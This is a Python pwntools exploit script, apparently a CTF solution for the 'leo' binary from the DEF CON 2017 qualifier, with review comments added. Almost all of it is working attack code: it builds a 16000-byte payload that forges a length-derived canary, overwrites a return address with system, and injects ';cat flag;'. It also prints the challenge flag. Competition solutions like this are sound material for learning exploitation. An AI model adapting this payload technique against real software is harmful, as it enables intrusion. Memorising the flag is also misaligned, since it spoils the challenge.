leo - defcon 2017
#!/usr/bin/env python2
#
# leo - defcon 2017 (DEF CON CTF Qualifier 2017)
#
# Leo es Pequeno
# You boys like Mexico?!
# leo_33e299c29ed3f0113f3955a4c6b08500.quals.shallweplayaga.me 61111
#
# The flag is: 2c641a4386ec64280ca77d1beae6d372
#
# @_hugsy_
from pwn import * | |
# pwntools context: 64-bit target, gdb opened in a vertical tmux split.
context.update(
    arch="amd64",
    # log_level="debug",
    terminal=["tmux", "split-window", "-v", "-p 85"],
)
# Run-mode flags; LOCAL / REMOTE are set in the __main__ block below.
# SSH is never set anywhere in this file.
LOCAL = REMOTE = SSH = False
TARGET = os.path.realpath("./leo")
# Parsed binary. NOTE(review): nothing below reads `elf`; the return
# address used by exploit() is hardcoded instead of looked up here.
elf = ELF(TARGET)
# Challenge host as a URL; not referenced by the code below.
url = "http://leo_33e299c29ed3f0113f3955a4c6b08500.quals.shallweplayaga.me"
def attach(r):
    """Attach gdb to the local process `r` when LOCAL is set.

    Does nothing for remote runs. The breakpoint list is empty (all
    addresses are commented out), so the gdb script only keeps the parent
    on fork and continues.
    """
    if not LOCAL:
        return
    # Addresses used while analysing the binary; all currently disabled.
    breakpoints = [
        # 0x4013CF,
        # 0x4019BA,
        # 0x401ADA,
        # 0x401ACA,
        # 0x401A9B,
        # 0x401BC1,
    ]
    script = ["break *{:#x}".format(addr) for addr in breakpoints]
    script += [
        "set follow-fork-mode parent",
        "c",
    ]
    gdb.attach(r, "\n".join(script))
def exploit(r):
    """Build the 16000-byte payload for `leo`, send it, and go interactive.

    `r` is a pwntools tube (local process or remote socket). The payload
    layout is reproduced from the original solution; the target-side checks
    it is meant to satisfy (length-derived "canary", an index field, every
    byte value present, a per-value occurrence quota) are inferred from the
    original's notes, not from the binary itself. This sends a fixed command
    string to the service, so only point it at a target you are authorised
    to test.
    """
    def nb_occur(data):
        # Occurrence table indexed by byte value for a (Python 2) byte string.
        return [data.count(chr(v)) for v in range(256)]

    attach(r)

    SZ = 16000
    # Occurrence quota each byte value is topped up to (620 for SZ=16000).
    constraint = (SZ >> 8) * 10

    parts = []
    parts.append("A" * 24)
    # "stack canary": the value is derived from the input length using the
    # compiler's signed-divide-by-two idiom, i.e. SZ/2 + 1 = 8001 here, so
    # it is fully predictable once we pick the length.
    parts.append(p32((((SZ >> 0x1f) + SZ) >> 1) + 1))
    # Index field: one byte chosen to skip past this region (24+3+8+4 = 39),
    # then filler for the remainder of the field, which is not copied.
    parts.append(p8((24 + 3) + 8 + 4))
    parts.append("C" * (3 + 8))
    # Return target, labelled "system@got" in the original. NOTE(review):
    # 0x400FD0 is hardcoded even though `elf` is loaded at module level;
    # confirm it against elf.plt["system"] / elf.got["system"] before reuse.
    parts.append(p64(0x00400FD0))
    # Every byte value 0..255 at least once: the original notes that no
    # occurrence count may be zero.
    parts.append("".join(chr(v) for v in range(256)))
    # Padding to line up with the stack frame.
    parts.append("A" * 256)
    parts.append("B" * (256 + 96))
    # Command tail, NUL-terminated; presumably what system() ends up running.
    parts.append(";cat flag;\0")
    payload = "".join(parts)

    # Top each byte value up to `constraint` occurrences, lowest values first,
    # until the payload reaches exactly SZ bytes. A value already above the
    # quota gets a non-positive fill, which appends nothing.
    have = nb_occur(payload)
    for value in range(256):
        fill = min(constraint - have[value], SZ - len(payload))
        payload += p8(value) * fill
        if len(payload) >= SZ:
            break

    r.send(payload)
    r.interactive()
if __name__ == "__main__":
    # `script.py HOST PORT` runs against the remote service; anything else
    # spawns ./leo locally (and attaches gdb via attach()).
    if len(sys.argv) != 3:
        LOCAL = True
        r = process([TARGET, ])
        log.info("Starting '{}' locally".format(TARGET))
    else:
        REMOTE = True
        HOST, PORT = sys.argv[1], int(sys.argv[2])
        r = remote(HOST, PORT)
        log.info("Starting '{}' remotely".format(TARGET))
    exploit(r)
    sys.exit(0)